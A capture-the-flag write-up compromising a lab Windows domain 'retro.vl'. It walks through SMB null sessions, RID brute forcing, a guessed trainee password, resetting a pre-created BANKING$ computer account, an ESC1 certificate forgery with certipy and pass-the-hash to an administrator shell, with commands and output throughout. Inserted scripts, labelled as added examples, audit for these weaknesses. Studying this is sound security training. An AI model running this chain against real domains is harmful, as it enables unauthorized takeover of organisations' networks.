PortScan

  • We scan for open ports over TCP.
➜  content cat ../nmap/targeted
# Nmap 7.94SVN scan initiated Sun Mar  3 17:26:17 2024 as: nmap -sCV -p53,135,139,389,445,464,3389,49719 -oN targeted 10.10.65.176
Nmap scan report for 10.10.65.176
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-03-02T23:18:09
|_Not valid after:  2024-09-01T23:18:09
|_ssl-date: 2024-03-03T23:28:08+00:00; -1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-03-03T23:27:29+00:00
49719/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-03-03T23:27:31
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

SMB Enumeration

  • We add the hostnames we have to /etc/hosts .
➜  content echo "10.10.65.176 retro.vl DC.retro.vl" | sudo tee -a /etc/hosts
  • We see that we are dealing with a Windows 10 machine.
➜  content crackmapexec smb 10.10.65.176
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
  • If we enumerate the SMB shares using a Null Session we find Trainees .
➜  content smbclient -L 10.10.65.176 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Notes           Disk
	SYSVOL          Disk      Logon server share
	Trainees        Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.65.176 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • Let's connect to the share.
➜  content smbclient //10.10.65.176/trainees
Password for [WORKGROUP\miguel]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 23 15:58:43 2023
  ..                                DHS        0  Wed Jul 26 03:54:14 2023
  Important.txt                       A      288  Sun Jul 23 16:00:13 2023

		6261499 blocks of size 4096. 2892471 blocks available
smb: \>
  • We find the following.
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
➜  content cat Important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins
  • So the admins tell us they are tired of dealing with the recurring problem of forgotten passwords, and that they created one account for all the trainees.

  • Since the admin created one account for everyone, we run a brute-force with crackmapexec over the RIDs of the domain's users, resolving each one against the domain SID .

➜  content crackmapexec smb 10.10.65.176 -u 'guest' -p '' --rid-brute
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\guest:
SMB         10.10.65.176    445    DC               [+] Brute forcing RIDs
SMB         10.10.65.176    445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.10.65.176    445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.10.65.176    445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.10.65.176    445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.10.65.176    445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.10.65.176    445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.10.65.176    445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.10.65.176    445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.65.176    445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.10.65.176    445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.65.176    445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.65.176    445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.65.176    445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.10.65.176    445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.10.65.176    445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.65.176    445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.10.65.176    445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.10.65.176    445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.10.65.176    445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.10.65.176    445    DC               1109: RETRO\tblack (SidTypeUser)
  • We see that the user trainee exists, and since the admin says they have had trouble remembering strong and unique passwords, the users' password must be very easy; if we try the username as the password we see it is correct.
➜  content crackmapexec smb 10.10.65.176 -u 'trainee' -p 'trainee'
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\trainee:trainee
  • Now that we have valid credentials, let's enumerate the SMB shares.
➜  content crackmapexec smb 10.10.65.176 -u 'trainee' -p 'trainee' --shares
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\trainee:trainee
SMB         10.10.65.176    445    DC               [+] Enumerated shares
SMB         10.10.65.176    445    DC               Share           Permissions     Remark
SMB         10.10.65.176    445    DC               -----           -----------     ------
SMB         10.10.65.176    445    DC               ADMIN$                          Remote Admin
SMB         10.10.65.176    445    DC               C$                              Default share
SMB         10.10.65.176    445    DC               IPC$            READ            Remote IPC
SMB         10.10.65.176    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.65.176    445    DC               Notes           READ
SMB         10.10.65.176    445    DC               SYSVOL          READ            Logon server share
SMB         10.10.65.176    445    DC               Trainees        READ
  • We don't see much beyond Notes , so let's use smbclient to connect.

  • We see a .txt file, so let's download it.

➜  content smbclient //10.10.65.176/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 23 16:03:16 2023
  ..                                DHS        0  Wed Jul 26 03:54:14 2023
  ToDo.txt                            A      248  Sun Jul 23 16:05:56 2023

		6261499 blocks of size 4096. 2891438 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
  • This is its content.
➜  content cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

Pre created computer account

  • Since they talk about the finance department, if we look back we find this earlier:
SMB         10.10.65.176    445    DC               1106: RETRO\BANKING$ 
  • If we search online we find the following information, which is very useful.

  • We can try with crackmapexec to see whether any of the passwords are correct.
➜  content  crackmapexec smb 10.10.65.176 -u 'BANKING$' -p 'banking'
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [-] retro.vl\BANKING$:banking STATUS_LOGON_FAILURE
  • It reports FAILURE, but if we read the article we find this.

  • If we dig a bit, we see that what we have to do is change the password.

  • The article also says so in the "Changing the password" section and tells us to use RPC, so we'll use an impacket tool to change the password. (If you see a different IP, it's because I paused the machine, started it again and the IP changed.)
➜  content impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.121.174 -newpass Passwordxd1234 -dc-ip 10.10.121.174 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
  • Now we verify that the password was changed successfully.
➜  content crackmapexec smb 10.10.121.174 -u 'BANKING$' -p 'Passwordxd1234'
SMB         10.10.121.174   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.121.174   445    DC               [+] retro.vl\BANKING$:Passwordxd1234
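The condition the note above describes, a stale computer account created with the "Assign this computer account as a pre-Windows 2000 computer" option, is something a defender can audit for directly: such accounts carry PASSWD_NOTREQD next to WORKSTATION_TRUST_ACCOUNT in userAccountControl (commonly the value 4128). The script below is an added example and not part of this write-up; it decodes userAccountControl and flags such accounts. The records it runs over are constructed, and the logonCount == 0 filter is an assumption added here to reduce noise, not a property of the pre-created flag itself.

```python
# Added example (not part of the write-up): decode userAccountControl and flag
# computer accounts that still look like pre-created, pre-Windows 2000 accounts.
# The records below are constructed; in practice they would come from an LDAP
# query such as (objectClass=computer) returning sAMAccountName,
# userAccountControl and logonCount.

# Documented userAccountControl bit values
UAC_FLAGS = {
    0x0001:  "SCRIPT",
    0x0002:  "ACCOUNTDISABLE",
    0x0020:  "PASSWD_NOTREQD",
    0x0200:  "NORMAL_ACCOUNT",
    0x1000:  "WORKSTATION_TRUST_ACCOUNT",
    0x2000:  "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000


def decode_uac(value):
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_precreated_candidate(record):
    """A computer account created with the "pre-Windows 2000" option keeps
    PASSWD_NOTREQD set next to WORKSTATION_TRUST_ACCOUNT (commonly UAC 4128).
    Requiring logonCount == 0 (the machine never actually joined) is a
    heuristic assumed here to cut noise; disabled accounts are skipped because
    they cannot be used for a logon."""
    uac = record["userAccountControl"]
    return bool(uac & WORKSTATION_TRUST_ACCOUNT
                and uac & PASSWD_NOTREQD
                and not uac & ACCOUNTDISABLE
                and record.get("logonCount", 0) == 0)


# Constructed sample records (values chosen to exercise each branch)
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",      "userAccountControl": 0x82000, "logonCount": 120},
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128,    "logonCount": 0},
    {"sAMAccountName": "WS01$",    "userAccountControl": 4096,    "logonCount": 33},
    {"sAMAccountName": "OLDBOX$",  "userAccountControl": 4130,    "logonCount": 0},
]


def audit_precreated(records):
    """Names of enabled computer accounts that match the pre-created pattern."""
    return [r["sAMAccountName"] for r in records if is_precreated_candidate(r)]


if __name__ == "__main__":
    for r in SAMPLE_COMPUTERS:
        uac = r["userAccountControl"]
        print(f"{r['sAMAccountName']:10} {uac:>7} {decode_uac(uac)}")
    print("pre-created candidates:", audit_precreated(SAMPLE_COMPUTERS))
```

Accounts the audit returns should be deleted if the machine no longer exists, or re-joined with a fresh password if it does; either removes the known initial password that the write-up relies on.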

Active Directory Certificate Services

➜  content certipy-ad find -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
  • retro.vl uses AD CS and has several templates, one of which is vulnerable.

ESC1 template

  • We see that the template is vulnerable to ESC1, which affects all computers in the domain: domain computers can enroll to obtain certificates, and the enrollee can supply the certificate subject. In addition, the certificate template allows client authentication. The template in use is RetroClients https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/ .
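The ESC1 conditions listed above can be checked mechanically from the certipy find output, which is useful when reviewing a CA with many templates. The script below is an added example and not certipy's own code: it parses the "Certificate Templates" section of the text output into one dictionary per template and flags a template as ESC1 when it is enabled, allows client authentication (or any purpose), lets the enrollee supply the subject, needs no manager approval or authorized signatures, and grants enrollment to a principal outside the admin groups. The sample input is constructed from the RetroClients entry shown above plus a second, safe template made up for contrast; the ADMIN_PRINCIPALS set is an assumption about which groups count as privileged.

```python
# Added example (not part of the write-up or of certipy): parse certipy's
# "Certificate Templates" text output and flag ESC1 conditions.
import re

# Groups treated as privileged enrollers (assumption; extend for your domain)
ADMIN_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}

IDX_RE = re.compile(r"^\s+\d+\s*$")                    # "  0" starts a template
KV_RE = re.compile(r"^\s+([A-Za-z][^:]*?)\s*:\s*(.*)$")  # "    Key   : value"
CONT_RE = re.compile(r"^\s{30,}(\S.*)$")               # deeply indented continuation


def parse_templates(text):
    """Return a list of {key: [values]} dicts, one per template in the output."""
    templates, current, last_key, in_section = [], None, None, False
    for line in text.splitlines():
        if line.strip() == "Certificate Templates":
            in_section = True
            continue
        if not in_section:
            continue
        if IDX_RE.match(line):
            current, last_key = {}, None
            templates.append(current)
            continue
        if current is None:
            continue
        m = CONT_RE.match(line)
        if m and last_key:
            current[last_key].append(m.group(1).strip())
            continue
        m = KV_RE.match(line)
        if m:
            last_key = m.group(1).strip()
            current[last_key] = [m.group(2).strip()]
        # section labels such as "Permissions" carry no value and are skipped
    return templates


def flag(t, key):
    return t.get(key, ["False"])[0] == "True"


def low_priv_enrollers(t):
    """Enrollment-rights principals that are not in the privileged set."""
    return [p for p in t.get("Enrollment Rights", [])
            if p.split("\\")[-1] not in ADMIN_PRINCIPALS]


def is_esc1(t):
    auth_eku = flag(t, "Client Authentication") or flag(t, "Any Purpose")
    return (flag(t, "Enabled") and auth_eku
            and flag(t, "Enrollee Supplies Subject")
            and not flag(t, "Requires Manager Approval")
            and t.get("Authorized Signatures Required", ["0"])[0] == "0"
            and bool(low_priv_enrollers(t)))


def audit_esc1(text):
    """Map template name -> low-privileged enrollers for every ESC1 template."""
    return {t["Template Name"][0]: low_priv_enrollers(t)
            for t in parse_templates(text) if is_esc1(t)}


# Constructed sample: RetroClients as printed above, plus a made-up safe template
SAMPLE = """Certificate Templates
  0
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\\Domain Admins
                                          RETRO.VL\\Domain Computers
                                          RETRO.VL\\Enterprise Admins
  1
    Template Name                       : SafeUser
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\\Domain Users
"""

if __name__ == "__main__":
    for name, who in audit_esc1(SAMPLE).items():
        print(f"ESC1: {name} enrollable by {', '.join(who)}")
```

For a flagged template the fix is any one of: clear the EnrolleeSuppliesSubject flag, require manager approval or a signature, or remove the enrollment right from broad groups such as Domain Computers.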

  • We can use certipy to request a certificate.

  • It tells us there is a minimum RSA key size.

➜  content certipy-ad req -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N)

  • Let's supply the exact key size so it works.
➜  content certipy-ad req -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
  • Now we authenticate to obtain the TGT; this is a type of credential used by the Kerberos protocol to authenticate a user in a domain.
➜  content certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.121.174
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': ********************************:********************************
  • Now that we have the hash, we get a shell using Pass the Hash .

Shell as administrator

  • And in the usual location we find the flag.
➜  content impacket-wmiexec administrator@10.10.121.174 -hashes ********************************:********************************
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro\administrator
C:\>type C:\Users\administrator\Desktop\root.txt
VL{************************}
C:\>